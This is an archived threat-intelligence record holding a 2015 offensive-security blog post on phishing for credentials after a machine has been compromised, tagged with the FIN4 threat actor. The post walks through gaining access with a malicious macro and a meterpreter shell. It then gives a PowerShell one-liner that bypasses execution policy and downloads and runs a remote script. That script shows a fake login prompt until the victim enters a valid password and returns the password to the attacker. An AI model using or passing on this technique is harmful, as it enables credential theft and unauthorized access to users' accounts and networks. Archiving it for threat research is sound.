{ "id": "f459c784-8462-4f54-b167-868f62541ba5", "created_at": "2026-04-06T00:19:54.037353Z", "updated_at": "2026-04-10T13:11:41.075487Z", "deleted_at": null, "sha1_hash": "5b8948db758228d32dd8cf6475103eb4c5919441", "title": "Phishing for Credentials: If you want it, just ask!", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 493248, "plain_text": "Phishing for Credentials: If you want it, just ask!\r\nPublished: 2015-01-21 · Archived: 2026-04-05 12:47:34 UTC\r\n**Update**\r\nI have updated the script so it checks for credential validation. The prompt will not close until the user enters the\r\ncorrect password. Once validated, it will display the password for you.\r\nToday, I was playing with Invoke-Mimikatz, which was created by @JosephBialek, which takes Mimikatz\r\n(created by @gentilkiwi) and loads it into memory. I absolutely LOVE this tool, but I get sad when I don’t have\r\nadmin rights on the box and I don’t want to touch disk. If all you are after are the current user’s credentials (for\r\nemail, vpn, network access), you can use this method. I initially thought of this after reading a report by FireEye\r\nregarding FIN4’s method of invoking an outlook login prompt when the macro is ran. You can find this report here\r\nYou can find my code here:\r\nhttps://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1\r\nBasically, you compromise a machine using a malicious VBA macro or some sort of other vector. Once you have\r\naccess to this machine, drop to a shell by typing “Shell” at the meterpreter prompt.\r\nFrom there, you can run the following command: powershell.exe -ep bypass -c IEX ((New-Object\r\nNet.WebClient).DownloadString(‘URL_To_Invoke-LoginPrompt’)); Invoke-LoginPrompt\r\n*When you add the URL to the Invoke-LoginPrompt script, make sure you use the “Raw” version on github or\r\nhost your own*\r\nhttps://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/\r\nPage 1 of 3\n\nWhen this runs, the user will get a prompt that is pre-populated with their domain and username.\r\nWhen the user enters their password, it will return it to you with the domain and the user’s username:\r\nFrom there, you can now login to whatever resources you want as that user.\r\nThanks,\r\nMatt N. (@enigma0x3)\r\nhttps://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/\r\nPage 2 of 3\n\nSource: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/\r\nhttps://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/" ], "report_names": [ "phishing-for-credentials-if-you-want-it-just-ask" ], "threat_actors": [ { "id": "2799bc47-e502-49f0-a289-87e3cc95ecc6", "created_at": "2022-10-25T15:50:23.706367Z", "updated_at": "2026-04-10T02:00:05.34551Z", "deleted_at": null, "main_name": "FIN4", "aliases": [ "FIN4" ], "source_name": "MITRE:FIN4", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "5f6ade4c-e2db-46f0-b1b4-529ea52d040b", "created_at": "2022-10-25T16:07:23.611546Z", "updated_at": "2026-04-10T02:00:04.687074Z", "deleted_at": null, "main_name": "FIN4", "aliases": [ "FIN4", "G0085", "Wolf Spider" ], "source_name": "ETDA:FIN4", "tools": [ "UpDocX" ], "source_id": "ETDA", "reports": null }, { "id": "3571da12-0890-45e7-85d3-04fac7070b52", "created_at": "2023-01-06T13:46:38.414772Z", "updated_at": "2026-04-10T02:00:02.964831Z", "deleted_at": null, "main_name": "WOLF SPIDER", "aliases": [ "FIN4", "G0085" ], "source_name": "MISPGALAXY:WOLF SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434794, "ts_updated_at": 1775826701, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5b8948db758228d32dd8cf6475103eb4c5919441.pdf", "text": "https://archive.orkl.eu/5b8948db758228d32dd8cf6475103eb4c5919441.txt", "img": "https://archive.orkl.eu/5b8948db758228d32dd8cf6475103eb4c5919441.jpg" } }